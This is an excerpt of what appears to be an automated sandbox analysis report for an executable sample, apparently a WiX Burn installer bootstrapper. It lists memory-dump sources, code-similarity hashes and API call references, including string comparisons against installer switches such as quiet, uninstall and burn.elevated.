                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 385c83007c3b0049de9eb5f057bad80239a2bcee999eeb11ea032eee83b68577
                                                                                                                                                                  • Instruction ID: 1ef62c60371baada408396e07430a5f1ed173c26ffdebb6f28c6317d1a8e1fe4
                                                                                                                                                                  • Opcode Fuzzy Hash: 385c83007c3b0049de9eb5f057bad80239a2bcee999eeb11ea032eee83b68577
                                                                                                                                                                  • Instruction Fuzzy Hash: D2B012C735C202AF321451059D06E37014CD2C2F15370E52FF408C0082D4894C840177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 4c641641aad174c45aa51f17bf9071dfeefb9b19ce4a5e4ee0631523ff9ad138
                                                                                                                                                                  • Instruction ID: 7cff7d77e8a2d8e1606be64d28c9f540cc15e0c909fb71bf6427bdef7238489b
                                                                                                                                                                  • Opcode Fuzzy Hash: 4c641641aad174c45aa51f17bf9071dfeefb9b19ce4a5e4ee0631523ff9ad138
                                                                                                                                                                  • Instruction Fuzzy Hash: DDB012C735C102AF311451059E06E36014CD2C2F15370E42FB408C0082E48A4D410177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: ced46cb21a788d710607bd50126f6394ac755d7716d69a3d6c4a9f441798be70
                                                                                                                                                                  • Instruction ID: 79a7fccd4c7f20f08c22ad81faae3fbd5a1211f3531d792c6f391bd9db9f3671
                                                                                                                                                                  • Opcode Fuzzy Hash: ced46cb21a788d710607bd50126f6394ac755d7716d69a3d6c4a9f441798be70
                                                                                                                                                                  • Instruction Fuzzy Hash: 10B012C335C102AF311451059C42E36014CC6C2F15372E42FB808C1042D4894C400177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 2676eafa6fc62e824bf4e310a0afa1e89246b6c79cae9ab60cca6abbab68f32e
                                                                                                                                                                  • Instruction ID: d740742aea37421b2c65e2cf530d3aa1a82c7e27cde8be36be7f3058c5deb80c
                                                                                                                                                                  • Opcode Fuzzy Hash: 2676eafa6fc62e824bf4e310a0afa1e89246b6c79cae9ab60cca6abbab68f32e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8EB012C735C102EF311451059D06F36014CE2C2F15370E82FB408C0082D4894C400177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 1f1afc9b72f94dec31fc49c31f3365d79122a13bcc44aaea127599aefe63e3ac
                                                                                                                                                                  • Instruction ID: 33c4a6648ec2a1a8749a2e0629d191f6e81e0d6b5a73741b88411c0cb9f39789
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f1afc9b72f94dec31fc49c31f3365d79122a13bcc44aaea127599aefe63e3ac
                                                                                                                                                                  • Instruction Fuzzy Hash: B6B012C335C1026F311491059C02F37014CD2C2F15370E82FB408C1082D4894C404177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 9c12cc7678b2a4fe7547d3a856483af39554879139e2ab463fb24e6f686ff45b
                                                                                                                                                                  • Instruction ID: b6c5ef4f0f6b51378e3d8438652d5a38307ea8bb39000d2dcec0064e5471a887
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c12cc7678b2a4fe7547d3a856483af39554879139e2ab463fb24e6f686ff45b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7CB012C335D1026F311451059C02F36014CD2C2F15370E82FF408C0042D4894C400277
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                  • Opcode ID: 42cd0d813035fd71b30e3b4fb05e0dd66dd89808048de6e358c847d437299749
                                                                                                                                                                  • Instruction ID: c4ab7b824240579041ed4ab1f64605cb10eb483b9a68d7623e1f890fac24f1fd
                                                                                                                                                                  • Opcode Fuzzy Hash: 42cd0d813035fd71b30e3b4fb05e0dd66dd89808048de6e358c847d437299749
                                                                                                                                                                  • Instruction Fuzzy Hash: 88B012C335D2026F321451059C02E37014CC2C2F153B0E52FB408C0042D4894C840177
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
                                                                                                                                                                    • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
                                                                                                                                                                    • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1269201914-0
• Opcode ID: f1366c2e48966173799297646f2970c55ecd145cf6729085468920d626023b9e
• Instruction ID: de23fdb5b79e7d718f0b9fd7e5fa9897bc13c02e592d4d73bb7ec7afe19ed563
• Opcode Fuzzy Hash: f1366c2e48966173799297646f2970c55ecd145cf6729085468920d626023b9e
• Instruction Fuzzy Hash: A3B012C735C1026F311451059D02E36014CCAC2F15370E42FB408C1043D48A4C410177
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C1E9
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 712a4077bca2b252b48397692485b50cc404dab79235b1e3ae5bc3182a4c7dad
• Instruction ID: e1d994922b9da8094f1292f98ace4085b0c02c1531462e287ae0f961fc63b6ec
• Opcode Fuzzy Hash: 712a4077bca2b252b48397692485b50cc404dab79235b1e3ae5bc3182a4c7dad
• Instruction Fuzzy Hash: 86B012C335C2026F321451059C06E37014CC6C2F15370E52FB408C1042D4894C840177
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C343
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: deae49989811cebe3ab504290a32e9127ef2d0b264f1196fb0997a0959f5e8ea
• Instruction ID: af6f22f1d039929f13caff729991da3ee99398abaab48f92b3edb82e0e51631e
• Opcode Fuzzy Hash: deae49989811cebe3ab504290a32e9127ef2d0b264f1196fb0997a0959f5e8ea
• Instruction Fuzzy Hash: E3B012D325C103BF314412049D02C3601CCC2D1F14370E81FB504C4040D8845C050073
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C424
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8ad0f80d2d9431e0e490ba4fc6d62258086f6cd8cb7feef1e2892eb5e2223dea
• Instruction ID: 517b46151ebab92b4236a816c72fa6657160bd9d92a52af7d5856320d2da29fe
• Opcode Fuzzy Hash: 8ad0f80d2d9431e0e490ba4fc6d62258086f6cd8cb7feef1e2892eb5e2223dea
• Instruction Fuzzy Hash: 69B012C325C102FF321421609C42C37028CC2C1F20331E42FB404C4042D9845C000073
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C424
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 6eed5beade134b65f7eb1280f05831a6d6db20b4d0558247514646be2ce05ba7
• Instruction ID: 11f6846ef3bb0071a923b32b2ba0db2dfe37b1e04a3a2bfce5a2b68001b462c9
• Opcode Fuzzy Hash: 6eed5beade134b65f7eb1280f05831a6d6db20b4d0558247514646be2ce05ba7
• Instruction Fuzzy Hash: A9B012C325E103BF321451549D02D36024CC2C5FA0331E42FF008C8040D8844C010073
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0097C424
  • Part of subcall function 0097C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0097C762
  • Part of subcall function 0097C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0097C773
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: f35dd0bbcc53f5e5190dd5de984288b39f79de5455c13f80991f2615c6d0197a
• Instruction ID: ebf6cd2fe4920e9754511d3c30b5f456fce640ee8e8a484560151c712971d918
• Opcode Fuzzy Hash: f35dd0bbcc53f5e5190dd5de984288b39f79de5455c13f80991f2615c6d0197a
• Instruction Fuzzy Hash: B9B012C326E103BF321451549C12E36024CD6C5F60331E82FF008C4040D8844C000073
APIs
• CloseHandle.KERNELBASE(FFFFFFFF,?,0096B428,00000000,00000000,?,00918106), ref: 0096AC55
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: e1a6192e2f76973b979749b83f693e73af4e3ba07503828c7c9807ba66288ac0
• Instruction ID: 1e1aa1eca8f3ff1b531e8dc2a8938a1e24727b0453b1efda0f0e9c78c1521481
• Opcode Fuzzy Hash: e1a6192e2f76973b979749b83f693e73af4e3ba07503828c7c9807ba66288ac0
• Instruction Fuzzy Hash: 56F0FE706292046BD620DB78DD89B5533EDAF56725F544704E061DA1F0DB38E884AE92
APIs
• CloseHandle.KERNELBASE(000000FF,?,?), ref: 0093DE0C
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 51856fa0c34b6a24cd29d6e5948180f2ba02039830432b49acc86b580dac36e2
• Instruction ID: 280808733f13c243ba533acb6a263204e21dc99ade56175cb32052e012f1b8a6
• Opcode Fuzzy Hash: 51856fa0c34b6a24cd29d6e5948180f2ba02039830432b49acc86b580dac36e2
• Instruction Fuzzy Hash: 8BF039315102049FDB119F68D848F553BA8BF18375F058258E9198B2F2C734D951DE90
APIs
• CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,0098E414,000000FF,00916C5C,00916C78,00916570,?,00000000,?), ref: 0093470C
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 0093472F
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00934752
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E458,000000FF), ref: 00934775
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E45C,000000FF), ref: 00934798
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 009347BB
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E46C,000000FF), ref: 009347DE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,quiet,000000FF), ref: 00934801
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E47C,000000FF), ref: 00934824
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,silent,000000FF), ref: 00934847
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,passive,000000FF), ref: 0093486A
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,layout,000000FF), ref: 00934898
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,unsafeuninstall,000000FF), ref: 00934970
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,uninstall,000000FF), ref: 009349AE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,repair,000000FF), ref: 009349EC
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,modify,000000FF), ref: 00934A2A
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,package,000000FF), ref: 00934A68
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,update,000000FF), ref: 00934A8B
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,noaupause,000000FF), ref: 00934AAE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,keepaupaused,000000FF), ref: 00934AD9
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,disablesystemrestore,000000FF), ref: 00934B0E
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,originalsource,000000FF), ref: 00934B3C
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent,000000FF), ref: 00934B9D
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent:none,000000FF), ref: 00934BFE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.log.append,000000FF), ref: 00934C51
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.log.mode,burn.log.mode,000000FF), ref: 00934C99
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00934CAB
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.log.mode), ref: 00934CBF
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.elevated,000000FF), ref: 00934D6C
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room), ref: 00934E5B
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room,burn.clean.room,00000000), ref: 00934E69
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00934E7B
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room), ref: 00934EFB
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.system.component), ref: 00934F7F
